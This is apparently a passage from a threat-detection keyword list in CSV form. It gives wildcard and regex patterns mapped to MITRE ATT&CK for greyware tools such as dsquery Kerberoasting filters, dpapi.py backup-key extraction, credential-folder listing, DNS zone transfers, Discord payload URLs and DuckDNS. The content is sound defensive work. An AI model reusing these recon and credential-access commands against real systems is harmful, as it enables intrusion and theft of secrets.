"*Microsoft.DevTunnels.Ssh.dll*",".{0,1000}Microsoft\.DevTunnels\.Ssh\.dll.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*Microsoft.DevTunnels.Ssh.Tcp.dll*",".{0,1000}Microsoft\.DevTunnels\.Ssh\.Tcp\.dll.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. 
Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*ssh @ssh.*.devtunnels.ms*",".{0,1000}ssh\s\@ssh\..{0,1000}\.devtunnels\.ms.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*tunnels-prod-rel-tm.trafficmanager.net*",".{0,1000}tunnels\-prod\-rel\-tm\.trafficmanager\.net.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*uks1.rel.tunnels.api.visualstudio.com*",".{0,1000}uks1\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. 
Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*use.rel.tunnels.api.visualstudio.com*",".{0,1000}use\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*use2.rel.tunnels.api.visualstudio.com*",".{0,1000}use2\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*usw2.rel.tunnels.api.visualstudio.com*",".{0,1000}usw2\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. 
Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*usw3.rel.tunnels.api.visualstudio.com*",".{0,1000}usw3\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*wss://*.tunnels.api.visualstudio.com/api/v1/Connect/*",".{0,1000}wss\:\/\/.{0,1000}\.tunnels\.api\.visualstudio\.com\/api\/v1\/Connect\/.{0,1000}","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*dig * axfr *@*",".{0,1000}dig\s.{0,1000}\saxfr\s.{0,1000}\@.{0,1000}","greyware_tool_keyword","dig","classic DNS Zone transfer request. The idea behind it is to attempt to duplicate all the DNS records for a given zone (or domain). 
This is a technique often used by attackers to gather information about the infrastructure of a target organization.","T1018","TA0007","N/A","N/A","Reconnaissance","https://linux.die.net/man/1/dig","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*dig *@* axfr*",".{0,1000}dig\s.{0,1000}\@.{0,1000}\saxfr.{0,1000}","greyware_tool_keyword","dig","classic DNS Zone transfer request. The idea behind it is to attempt to duplicate all the DNS records for a given zone (or domain). This is a technique often used by attackers to gather information about the infrastructure of a target organization.","T1018","TA0007","N/A","N/A","Reconnaissance","https://linux.die.net/man/1/dig","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dir /s */ Microsoft.ActiveDirectory.Management.dll*",".{0,1000}\sdir\s\/s\s.{0,1000}\/\sMicrosoft\.ActiveDirectory\.Management\.dll.{0,1000}","greyware_tool_keyword","dir","threat actors searched for Active Directory related DLLs in directories","T1059 - T1083 - T1018","TA0002 - TA0009 - TA0040","N/A","N/A","Discovery","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*dir /b/a %appdata%\Microsoft\Credentials\ 2>nul*",".{0,1000}dir\s\/b\/a\s\%appdata\%\\Microsoft\\Credentials\\\s2\>nul.{0,1000}","greyware_tool_keyword","dir","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z" "*dir /b/a %localappdata%\Microsoft\Credentials\ 2>nul*",".{0,1000}dir\s\/b\/a\s\%localappdata\%\\Microsoft\\Credentials\\\s2\>nul.{0,1000}","greyware_tool_keyword","dir","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z" "*https://media.discordapp.net/attachments/*.bat*",".{0,1000}https\:\/\/media\.discordapp\.net\/attachments\/.{0,1000}\.bat.{0,1000}","greyware_tool_keyword","discord","Downloading discord executables and archives attachments","T1189","TA0001 - TA0009","N/A","N/A","Collection","N/A","1","1","N/A","N/A","6","9","N/A","N/A","N/A","N/A" "*https://media.discordapp.net/attachments/*.exe*",".{0,1000}https\:\/\/media\.discordapp\.net\/attachments\/.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","discord","Downloading discord executables and archives attachments","T1189","TA0001 - TA0009","N/A","N/A","Collection","N/A","1","1","N/A","N/A","6","9","N/A","N/A","N/A","N/A" "*https://media.discordapp.net/attachments/*.hta*",".{0,1000}https\:\/\/media\.discordapp\.net\/attachments\/.{0,1000}\.hta.{0,1000}","greyware_tool_keyword","discord","Downloading discord executables and archives attachments","T1189","TA0001 - TA0009","N/A","N/A","Collection","N/A","1","1","N/A","N/A","6","9","N/A","N/A","N/A","N/A" "*https://media.discordapp.net/attachments/*.iso*",".{0,1000}https\:\/\/media\.discordapp\.net\/attachments\/.{0,1000}\.iso.{0,1000}","greyware_tool_keyword","discord","Downloading discord executables and archives attachments","T1189","TA0001 - TA0009","N/A","N/A","Collection","N/A","1","1","N/A","N/A","6","9","N/A","N/A","N/A","N/A" "*https://media.discordapp.net/attachments/*.jar*",".{0,1000}https\:\/\/media\.discordapp\.net\/attachments\/.{0,1000}\.jar.{0,1000}","greyware_tool_keyword","discord","Downloading discord executables and archives attachments","T1189","TA0001 - TA0009","N/A","N/A","Collection","N/A","1","1","N/A","N/A","6","9","N/A","N/A","N/A","N/A" 
"*https://media.discordapp.net/attachments/*.msi*",".{0,1000}https\:\/\/media\.discordapp\.net\/attachments\/.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","discord","Downloading discord executables and archives attachments","T1189","TA0001 - TA0009","N/A","N/A","Collection","N/A","1","1","N/A","N/A","6","9","N/A","N/A","N/A","N/A" "*https://media.discordapp.net/attachments/*.py*",".{0,1000}https\:\/\/media\.discordapp\.net\/attachments\/.{0,1000}\.py.{0,1000}","greyware_tool_keyword","discord","Downloading discord executables and archives attachments","T1189","TA0001 - TA0009","N/A","N/A","Collection","N/A","1","1","N/A","N/A","6","9","N/A","N/A","N/A","N/A" "*https://media.discordapp.net/attachments/*.vbs*",".{0,1000}https\:\/\/media\.discordapp\.net\/attachments\/.{0,1000}\.vbs.{0,1000}","greyware_tool_keyword","discord","Downloading discord executables and archives attachments","T1189","TA0001 - TA0009","N/A","N/A","Collection","N/A","1","1","N/A","N/A","6","9","N/A","N/A","N/A","N/A" "*https://media.discordapp.net/attachments/*.zip*",".{0,1000}https\:\/\/media\.discordapp\.net\/attachments\/.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","discord","Downloading discord executables and archives attachments","T1189","TA0001 - TA0009","N/A","N/A","Collection","N/A","1","1","N/A","N/A","6","9","N/A","N/A","N/A","N/A" "*diskshadow list shadows all*",".{0,1000}diskshadow\slist\sshadows\sall.{0,1000}","greyware_tool_keyword","diskshadow","List shadow copies using diskshadow","T1059.003 - T1059.001 - T1005","TA0002 - TA0005 - TA0010","N/A","N/A","discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "* denied AXFR from *",".{0,1000}\sdenied\sAXFR\sfrom\s.{0,1000}","greyware_tool_keyword","dns","Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation 
tool","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","4398","1030","2024-06-06T14:56:10Z","2013-09-17T17:07:58Z" "* dropping source port zero packet from *",".{0,1000}\sdropping\ssource\sport\szero\spacket\sfrom\s.{0,1000}","greyware_tool_keyword","dns","Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","4398","1030","2024-06-06T14:56:10Z","2013-09-17T17:07:58Z" "* exiting (due to fatal error)*",".{0,1000}\sexiting\s\(due\sto\sfatal\serror\).{0,1000}","greyware_tool_keyword","dns","Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","4398","1030","2024-06-06T14:56:10Z","2013-09-17T17:07:58Z" "*dnscmd . /enumrecords /zone *",".{0,1000}dnscmd\s\.\s\/enumrecords\s\/zone\s.{0,1000}","greyware_tool_keyword","dnscmd","the actor gathers information about the target environment","T1018 - T1049","TA0007 - TA0009","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*dnscmd . 
/enumzones*",".{0,1000}dnscmd\s\.\s\/enumzones.{0,1000}","greyware_tool_keyword","dnscmd","the actor gathers information about the target environment","T1018 - T1049","TA0007 - TA0009","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*.dnslog.cn:*",".{0,1000}\.dnslog\.cn\:.{0,1000}","greyware_tool_keyword","dnslog.cn","allows users to create a unique URL to collect and inspect HTTP requests. It is commonly used for debugging webhooks - it can also be abused by attackers for verifying the reachability and effectiveness of their payloads","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","http://dnslog.cn","1","1","N/A","Out of band interaction domains","10","10","N/A","N/A","N/A","N/A" "*http://dnslog.cn/*",".{0,1000}http\:\/\/dnslog\.cn\/.{0,1000}","greyware_tool_keyword","dnslog.cn","allows users to create a unique URL to collect and inspect HTTP requests. 
It is commonly used for debugging webhooks - it can also be abused by attackers for verifying the reachability and effectiveness of their payloads","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","http://dnslog.cn","1","1","N/A","Out of band interaction domains","10","10","N/A","N/A","N/A","N/A" "*kpiecbcckbofpmkkkdibbllpinceiihk*",".{0,1000}kpiecbcckbofpmkkkdibbllpinceiihk.{0,1000}","greyware_tool_keyword","DotVPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*mjolnodfokkkaichkcjipfgblbfgojpa*",".{0,1000}mjolnodfokkkaichkcjipfgblbfgojpa.{0,1000}","greyware_tool_keyword","DotVPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*dpapi.py backupkeys -t */*@*",".{0,1000}dpapi\.py\sbackupkeys\s\-t\s.{0,1000}\/.{0,1000}\@.{0,1000}","greyware_tool_keyword","dpapi.py","the command is used to extract the Data Protection API (DPAPI) backup keys from a target system. DPAPI is a Windows API that provides data protection services to secure sensitive data. such as private keys. passwords. and other secrets. By obtaining the DPAPI backup keys. an attacker can potentially decrypt sensitive data stored on the target system or impersonate users. 
gaining unauthorized access to other systems and resources.","T1552.006","TA0009","N/A","N/A","Collection","N/A","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*https://content.dropboxapi.com/2/files/upload*",".{0,1000}https\:\/\/content\.dropboxapi\.com\/2\/files\/upload.{0,1000}","greyware_tool_keyword","dropbox","uploading file to dropbox with the API","T1105 - T1071.001 - T1567.002","TA0011 - TA0009 - TA0010","N/A","BlackCat - Scattered Spider*","Data Exfiltration","https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/DropBox-Upload.md","1","1","N/A","N/A","6","10","1064","118","2024-06-16T04:10:39Z","2022-05-10T04:12:53Z" "*https://dropmefiles.com/*",".{0,1000}https\:\/\/dropmefiles\.com\/.{0,1000}","greyware_tool_keyword","dropmefiles.com","temporary file hosting service - abused by attackers to share information with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Mallox","Collection","https://github.com/Casualtek/Ransomchats/blob/4a25ac6ad165a4e600aeb72718c3ad41e8f6ce3a/Mallox/20230427.json#L286C25-L286C48","1","1","N/A","downloading files url","8","5","410","38","2024-08-30T10:51:23Z","2023-05-02T16:17:48Z" "*https://dropmefiles.com/s3/upload/*",".{0,1000}https\:\/\/dropmefiles\.com\/s3\/upload\/.{0,1000}","greyware_tool_keyword","dropmefiles.com","temporary file hosting service - abused by attackers to share information with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Mallox","Data Exfiltration","https://github.com/Casualtek/Ransomchats/blob/4a25ac6ad165a4e600aeb72718c3ad41e8f6ce3a/Mallox/20230427.json#L286C25-L286C48","1","1","N/A","uploading files url","10","5","410","38","2024-08-30T10:51:23Z","2023-05-02T16:17:48Z" "*dsquery * -filter *(objectClass=trustedDomain)* -attr *",".{0,1000}dsquery\s.{0,1000}\s\-filter\s.{0,1000}\(objectClass\=trustedDomain\).{0,1000}\s\-attr\s.{0,1000}","greyware_tool_keyword","dsquery","enumerate domain trusts with dsquery","T1482 - 
T1018","TA0007","N/A","APT41 - FIN8","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*-filter *(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32*",".{0,1000}\-filter\s.{0,1000}\(\&\(objectCategory\=person\)\(objectClass\=user\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=32.{0,1000}","greyware_tool_keyword","dsquery","Finding users Not Required to Have a Password","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","APT41 - FIN8","Discovery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*-filter *(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304*",".{0,1000}\-filter\s.{0,1000}\(\&\(objectCategory\=person\)\(objectClass\=user\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=4194304.{0,1000}","greyware_tool_keyword","dsquery","Finding accounts with Kerberos Pre-Authentication Disabled","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","APT41 - FIN8","Discovery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*-filter *(&(objectClass=User)(msDS-AllowedToDelegateTo=*",".{0,1000}\-filter\s.{0,1000}\(\&\(objectClass\=User\)\(msDS\-AllowedToDelegateTo\=.{0,1000}","greyware_tool_keyword","dsquery","Finding accounts with constrained delegation","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","APT41 - FIN8","Discovery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*-filter 
*(&(objectClass=user)(servicePrincipalName=*)(!(cn=krbtgt))(!(samaccounttype=805306369*",".{0,1000}\-filter\s.{0,1000}\(\&\(objectClass\=user\)\(servicePrincipalName\=.{0,1000}\)\(!\(cn\=krbtgt\)\)\(!\(samaccounttype\=805306369.{0,1000}","greyware_tool_keyword","dsquery","Finding Kerberoastable Users","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","APT41 - FIN8","Discovery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*-filter *(&(objectClass=User)(serviceprincipalname=*)(samaccountname=* -limit 0 -attr samaccountname serviceprincipalname*",".{0,1000}\-filter\s.{0,1000}\(\&\(objectClass\=User\)\(serviceprincipalname\=.{0,1000}\)\(samaccountname\=.{0,1000}\s\-limit\s0\s\-attr\ssamaccountname\sserviceprincipalname.{0,1000}","greyware_tool_keyword","dsquery","Finding accounts with SPNs","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","APT41 - FIN8","Discovery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*-filter *(userAccountControl:1.2.840.113556.1.4.803:=524288)*",".{0,1000}\-filter\s.{0,1000}\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=524288\).{0,1000}","greyware_tool_keyword","dsquery","Finding accounts with unconstrained delegation","T1021.004 - T1087.002 - T1018","TA0007 - TA0008 - TA0011","N/A","APT41 - FIN8","Discovery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A" "*/DuckDNS.7z*",".{0,1000}\/DuckDNS\.7z.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A" 
"*/DuckDNS.git*",".{0,1000}\/DuckDNS\.git.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*/DuckDNS.zip""*",".{0,1000}\/DuckDNS\.zip\"".{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*/duckdns/duck.log*",".{0,1000}\/duckdns\/duck\.log.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*/duckdns/duck.sh*",".{0,1000}\/duckdns\/duck\.sh.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*/duckdns-powershell.git*",".{0,1000}\/duckdns\-powershell\.git.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*/opt/duckdns/*",".{0,1000}\/opt\/duckdns\/.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free 
dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*\DuckDNS.cfg*",".{0,1000}\\DuckDNS\.cfg.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*\DuckDNS.csproj*",".{0,1000}\\DuckDNS\.csproj.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*\DuckDNS.exe*",".{0,1000}\\DuckDNS\.exe.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*\DuckDNS.lnk*",".{0,1000}\\DuckDNS\.lnk.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*\DuckDNS.sln*",".{0,1000}\\DuckDNS\.sln.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense 
Evasion","https://www.duckdns.org/install.jsp","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*\Update-DuckDNS.ps1*",".{0,1000}\\Update\-DuckDNS\.ps1.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*4B9C98F6-AF30-4280-873D-B45C7A7B89EB*",".{0,1000}4B9C98F6\-AF30\-4280\-873D\-B45C7A7B89EB.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","0","#GUIDproject","N/A","5","10","N/A","N/A","N/A","N/A" "*8a35136501dde420ec5f3e88a7906c8c3d63af06621b47513befe8f09db3ed04*",".{0,1000}8a35136501dde420ec5f3e88a7906c8c3d63af06621b47513befe8f09db3ed04.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","0","#filehash","N/A","5","10","N/A","N/A","N/A","N/A" "*ataylor32/duckdns-powershell*",".{0,1000}ataylor32\/duckdns\-powershell.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*chmod 700 duck.sh*",".{0,1000}chmod\s700\sduck\.sh.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - 
T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*https://www.duckdns.org/update?domains=*",".{0,1000}https\:\/\/www\.duckdns\.org\/update\?domains\=.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*jzelinskie/duckdns*",".{0,1000}jzelinskie\/duckdns.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*Sending update request to Duck DNS*",".{0,1000}Sending\supdate\srequest\sto\sDuck\sDNS.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","0","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*XWolfOverride/DuckDNS*",".{0,1000}XWolfOverride\/DuckDNS.{0,1000}","greyware_tool_keyword","duckdns.org","A simple C# DuckDNS updater - free dynamic DNS hosted on AWS - often used by threat actors for contacting C2","T1568.002 - T1071.001","TA0011 - TA0005","N/A","N/A","Defense Evasion","https://www.duckdns.org/install.jsp","1","1","N/A","N/A","5","10","N/A","N/A","N/A","N/A" "*--headless --disable-gpu --disable-logging --dump-dom https://getip.pro*",".{0,1000}\-\-headless\s\-\-disable\-gpu\s\-\-disable\-logging\s\-\-dump\-dom\shttps\:\/\/getip\.pro.{0,1000}","greyware_tool_keyword","ducktail","infostealer command to retrieve 
